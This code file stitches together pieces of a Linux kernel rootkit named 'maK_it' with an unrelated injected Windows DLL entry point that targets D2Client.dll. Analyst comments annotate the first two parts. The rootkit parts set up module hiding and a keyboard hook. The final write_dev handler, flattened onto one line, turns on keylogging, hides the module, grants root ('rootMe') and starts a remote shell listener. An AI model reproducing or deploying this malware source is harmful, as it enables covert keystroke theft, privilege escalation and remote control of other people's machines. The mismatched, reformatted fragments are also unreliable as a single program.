/*
 * init_mod - module entry point of the "maK_it" kernel module.
 *
 * Visible sequence: hide the module, hook keyboard events, initialise a
 * semaphore, clear the key buffer, then register a character device that
 * serves as the local control channel (see the fops table, not shown here).
 *
 * Returns 0 on success, or the negative value from register_chrdev().
 *
 * Analyst notes:
 *  - hide_module() runs before anything else; its body is not shown, so
 *    which listing it removes the module from must be confirmed there.
 *  - Character devices registered with register_chrdev() normally appear in
 *    /proc/devices under DEVICE_NAME, unless other code (not shown) filters
 *    that view. This is a useful cross-check when the module list looks clean.
 *  - All printk output uses the fixed prefix "maK_it:" and is gated on the
 *    debug flag, so kernel-log hits exist only while debug is enabled.
 */
static int init_mod(void){
	// Hide the module on start (implementation not shown).
	hide_module();

	// Subscribe notifier block nb to keyboard events; the callback lives in nb (not shown).
	register_keyboard_notifier(&nb);
	// Semaphore s starts with a count of 1; what it guards is not visible here.
	sema_init(&s, 1);

	// Clear the key buffer, then register the character device.
	memset(keyBuffer, 0, sizeof(keyBuffer));
	major = register_chrdev(DEVICE_MAJOR, DEVICE_NAME, &fops);

	// The debug line logs the requested constant DEVICE_MAJOR, not the value returned in major.
	if(debug == 1)
		printk(KERN_ALERT "maK_it: Major %i \n", DEVICE_MAJOR);

	if(major < 0){
		// The message text says "-1", but the value returned is whatever register_chrdev() reported.
		if(debug == 1)
			printk(KERN_INFO "maK_it: Major device failed with -1");
		// NOTE(review): this path returns without unregistering the keyboard
		// notifier or undoing hide_module(); a host where the load failed may
		// therefore show kernel instability rather than a clean rejection.
		return major;
	}
	return 0;
}
/*
 * DllMain - entry point of a DLL that sets itself up inside a host process.
 *
 * Only DLL_PROCESS_ATTACH is handled. The visible sequence is: parse the
 * command line, record the module base, run anti_debugging(), then a
 * short-circuit chain of setup steps (module hiding, hot patches, exception
 * handler, main-thread processing, embedded Python). If any step returns
 * false the function never returns. Always returns TRUE otherwise.
 *
 * Analyst notes:
 *  - All of this runs inside DllMain, i.e. while the loader lock is held.
 *    Microsoft's DllMain guidance advises against calling LoadLibrary or
 *    blocking here; the failure path below hangs the process for that reason.
 *  - anti_debugging() and hide_module(module_base) are named but not shown;
 *    what they check or modify must be confirmed in their definitions.
 *  - "D2Client.dll" is loaded by bare name; presumably this is the game
 *    client module the patches target -- confirm against apply_hot_patches().
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	if(fdwReason == DLL_PROCESS_ATTACH)
	{
		process_command_line();

		// The module handle doubles as the image base address.
		void * module_base = reinterpret_cast<void *>(hinstDLL);
		// Casting the handle to unsigned only fits a 32-bit pointer, which implies a 32-bit build.
		if(verbose)
			write_line("Module base: " + ail::hex_string_32(reinterpret_cast<unsigned>(hinstDLL)));

		initialise_dll_vector();
		anti_debugging();

		// && short-circuits: the first step that returns false stops the chain,
		// so later steps are skipped and earlier ones are not rolled back.
		if(! (
			hide_module(module_base) &&
			apply_hot_patches() &&
			install_exception_handler() &&
			process_main_thread() &&
			python::initialise_python()
		) )
		{
			console_output = true;
			write_line("A fatal error occured, the program is not going to continue, please close this window.");
			// Never returns: the attaching thread spins here with the loader lock
			// held, so the host process stays stuck in DLL load. Observable as a
			// hung process with one thread yielding in a tight loop.
			while(true)
				Sleep(0);
		}

		if(prompt_mode)
			initialise_console();

		// The return value is ignored, so a failed load goes unnoticed here.
		LoadLibrary("D2Client.dll");
	}

	return TRUE;
}
//write to device (take commands) static ssize_t write_dev(struct file *filp, const char *buff, size_t len, loff_t *posPtr){ const char *cmdPtr; const char *cmdEndPtr; int i; char c; cmdPtr = buff; cmdEndPtr = buff + len - 1; i = 0; //This section handles our commands. if(len < MAX_CMD_LENGTH){ memset(commands, 0, sizeof(commands)); while(cmdPtr != cmdEndPtr){ c = *cmdPtr; commands[i] = c; cmdPtr++; i++; } if(debug == 1) printk(KERN_ALERT "maK_it: command: %s \n",commands); if(strcmp(commands, "debug") == 0){ if(debug == 0){ debug = 1;} else{ debug = 0;} } if(strcmp(commands,"keyLogOn") == 0){ keyLogOn = 1; if(debug == 1) printk(KERN_ALERT "maK_it: Key logger on!\n"); } if(strcmp(commands, "keyLogOff") == 0){ keyLogOn = 0; if(debug == 1) printk(KERN_ALERT "maK_it: Key logger off!\n"); } if(strcmp(commands, "modHide") == 0){ hide_module(); if(debug == 1) printk(KERN_ALERT "maK_it: Module Hidden!\n"); } if(strcmp(commands, "modReveal") == 0){ reveal_module(); if(debug == 1) printk(KERN_ALERT "maK_it: Module revealed!\n"); } if(strcmp(commands, "rootMe") == 0){ root_me(); if(debug == 1) printk(KERN_ALERT "maK_it: Given r00t!\n"); } if(strcmp(commands, "shellUp") == 0){ if(shellUp == 0){ start_listener(); shellUp = 1; } if(debug == 1) printk(KERN_ALERT "maK_it: Remote Shell listener started!\n"); } if(strcmp(commands, "shellDown") == 0){ if(shellUp == 1){ kill_listener(); shellUp = 0; } if(debug == 1) printk(KERN_ALERT "maK_it: Remote Shell listener down!\n"); } if(strcmp(commands, "command") == 0) printk(KERN_EMERG "commands: debug, keyLogOn/Off, modHide/Reveal, rootMe, shellUp/Down\n"); } else{ if(debug == 1) printk(KERN_ALERT "maK_it: Command was too long.\n"); } return -EINVAL; }